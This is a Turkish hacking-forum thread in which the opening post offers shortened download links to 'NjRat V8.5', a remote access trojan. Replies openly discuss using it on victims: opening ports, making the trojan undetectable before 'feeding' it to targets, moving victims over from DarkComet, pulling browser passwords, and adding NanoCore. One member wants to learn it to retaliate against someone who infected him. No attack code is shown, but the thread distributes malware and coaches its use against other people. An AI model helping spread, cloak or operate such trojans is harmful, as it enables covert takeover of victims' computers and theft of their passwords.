NjRat V8.5 Özel Edit / Son Sürüm /AROCKS

AROCKS

Katılımcı Üye
26 Mar 2018
945
59
%appdata% ~ Crypted '
[SIZE="4[COLOR="White [URL="https://tik.lat/H30lR"] NjRat V8.5[/URL]
[SIZE="4 [URL="https://tik.lat/qRUsp"] VT[/URL][/COLOR][/SIZE]
[/SIZE][/COLOR][/CENTER][/CENTER][/COLOR][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER][/CENTER][/COLOR][/SIZE][/CENTER]
[/COLOR][/SIZE][/COLOR][/COLOR][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][/COLOR]
[/COLOR][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][/COLOR][COLOR="Lime
 

nobodyLikesme

Yeni üye
2 Şub 2019
44
0
İzmir
Kendi bilgisayarımda denedim upload download veri alışverişi var ama serveri görmüyor sorunlu galiba Mr-Abu Hani diye bir adam tarafindan 2 yıl önce editlenmiş patlamış şuan galiba çalıştıramadım.

beyler birisi bana virüs atmıştı bende sınırlendım rat nasıl kullanılır dıye araştırdım fakat bir sonuç elde edemedım port açmakta zorlanıyorum birisi yardım edebılır mı adam akıllı :mahcup:

https://www.turkhackteam.org/trojan...22-02-2019-100-calisan-port-acma-yontemi.html

Buyrun kendi konum videolu anlatım var fakat rat yedirmeniz için onu önce fudlamanız gerekir, detaylı bilgiyi forumda araştırma yaparak öğrenebilirsiniz.
 
Moderatör tarafında düzenlendi:

hellthelast1

Yeni üye
27 Eyl 2010
36
0
15 senedir bu işlerle ugrasıyorum hiç bu kadar yararlı bir konu görmemiştim. yeni başlayanlar için çok faydalı olmuş. ayrıca şöyle bir tavsiyede bulunabilirim. nj'nin ' recovery pass ' özelliği çalışmıyor bunun için yanında nanocore kullanabilirsiniz.
 

T20

Üye
26 Haz 2016
94
0
Herşey tamam darkcometten kurbanları buna geçiriyorum hiçbiri geçmiyor port herşey sıkıntısız hiçbir sorun yok ama geçmiyor
 

MuratBeyl

Yeni üye
31 Ocak 2019
12
0
Port açılmıyor 1 ay uğraştım sebebi ne olabilir veya Port gerekmeden yapılabilen bir key varmı ?
 

LaiLaiZhen

Yeni üye
23 Haz 2015
37
0
svchost.exe
ben golden edition sürümünü kullanıyorum tüm her işlevi çalışıyor ancak sadece get passaword a tıkladıgımda tarayıcı şifreleri çıkmıyo tek sorun bu neden acaba biliyomusunuz
 

BlurZ

Üye
27 Mar 2016
162
0
27
İstanbul
dostum kendi serverimi açtım fakat users kısmına gelmedi connections 1 diyor ancak kurbanlar kısmında gözükmüyorum sebebi nedir ?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.